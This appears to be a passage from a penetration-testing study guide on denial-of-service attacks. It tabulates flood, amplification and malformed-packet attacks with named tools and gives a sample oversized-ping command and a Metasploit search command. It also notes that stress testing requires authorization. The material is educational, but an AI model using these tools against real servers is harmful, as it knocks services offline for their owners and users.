A denial-of-service (DoS) attack is one that prevents the target from performing its normal duties on the network. Although this is typically accomplished by flooding the server with network traffic, it can also be accomplished by crashing a service or consuming all of the server's resources, including CPU, memory, disk space, or allowed client connections. The attack can be protocol-, operating system-, or service-specific. You can try crafting packets to evade IDS or firewall detection. For network-traffic-based DoS attacks, a single attacker is unlikely to have much (if any) impact. The most serious exploits are distributed denial-of-service (DDoS) attacks, in which thousands or hundreds of thousands of machines (typically in a botnet) are coordinated to attack a single target.
The following table summarizes common DoS attack types and tools.
DoS Attack Type | Description | Tool Examples |
Packet flood | Create and send massive amounts of TCP, UDP, ICMP, or random packet traffic to target. Can include different TCP flag variants. | hping3, nemesy, XOIC, Low Orbit Ion Cannon (LOIC), Spike DDoS Toolkit, xcrush-20 |
SYN flood | Create and send massive amounts of TCP SYN packets. | hping3, Metasploit auxiliary/dos/tcp/synflood, Spike DDoS Toolkit, xcrush-20 |
Ping of Death | Send ICMP ECHO REQUESTs that are larger than 65,536 bytes, causing the target to crash, freeze, or reboot. | jolt, xcrush-20, eugenics.pl, Crazy Pinger, ping.exe; e.g., ping -l 65510 your.target.ip.address |
ICMP/UDP fragmentation attack | Variant of UDP flood or Ping of Death. Send the target UDP or ICMP fragments that when reassembled are too large for the network's MTU. | hping3, spike.sh, eugenics.pl |
TCP fragmentation attack | Send the target TCP fragments that have overlapping sequence numbers and cannot be reassembled. Windows NT, Windows 95, and Linux versions prior to version 2.1.63 are most vulnerable. | Teardrop, NewTear, Bonk, Boink, Targa, xcrush-20, eugenics.pl |
Smurf attack | Send large numbers of spoofed ICMP ECHO REQUESTs to intermediate devices that all respond to a single target. | hping3, xcrush-20, eugenics.pl |
Fraggle attack | Same as a Smurf attack, except uses UDP instead of ICMP. | xcrush-20, eugenics.pl |
Land attack | Send spoofed packet where source and destination IP are the same. The target floods itself with packets. | hping3, Land, Targa, LaTierra, xcrush-20, eugenics.pl |
SMB malformed request | Send a malformed request to an SMB named pipe causing a Blue Stop Screen (Blue Screen of Death) on Windows. | SMBDie, Bitchslap |
Slowloris | Keep as many fake web connections as possible open for as long as possible, until the maximum number of allowed connections is reached. Allows one web server to take down another without impacting other ports or services on the target network. | Slowloris script, R-U-Dead-Yet (RUDY) |
NTP amplification | Send spoofed NTP queries to publicly available NTP servers to overwhelm a target with UDP traffic. | NTPDos, NTPDoser, Saddam |
HTTP flood attack | Use seemingly legitimate HTTP GET or POST requests to attack a web server. Does not require spoofing or malformed packets, but can consume a high amount of resources with a single request. | High Orbit Ion Cannon (HOIC), Low Orbit Ion Cannon (LOIC), XOIC, HULK, DDOSIM, Tor's Hammer, PyLoris, OWASP DOS HTTP POST, DAVOSET, GoldenEye HTTP Denial Of Service Tool, Spike DDoS Toolkit |
DNS flood attack | Consume all CPU or memory of a DNS server with a flood of requests. | zodiac, DNS Flood, Hyenae, Spike DDoS Toolkit |
DNS amplification attack | Like Smurf or other amplification attacks, multiple public DNS servers receive spoofed queries and respond to a target. | Saddam, Tsunami, DDoS Attack |
Note: Many of these tools can be used for multiple DoS attack types. You may find variants with different features.
The following figure shows the command and output from a web server SYN flood generated from the hping3 tool.
Note: You can search for Metasploit DoS modules at the msf console. For example, to search for DoS attacks that involve DNS, enter search type:auxiliary name:dos -S dns.
Stress Testing
Stress testing is a euphemism for conducting a denial-of-service attack against a target. You can use scripts, bots, or other tools to deliberately and intensively attack a server or service to see how it performs. Some stress testers simply flood the target with distributed denial-of-service (DDoS) traffic. Others are application-specific and simulate very high numbers of actual user requests. An administrator might use stress testing to ensure that a website can withstand attacks or abnormally high traffic.
Because the intent is to render the service non-functional, a pen tester would need authorization to stress test a production machine. Additionally, the client would need to understand the implications of stress testing live servers. There are many commercially available stress testing services and products available online. There are also several sites online that will rent you their illegal botnet for "stress testing" purposes. These sites charge a nominal price by the hour.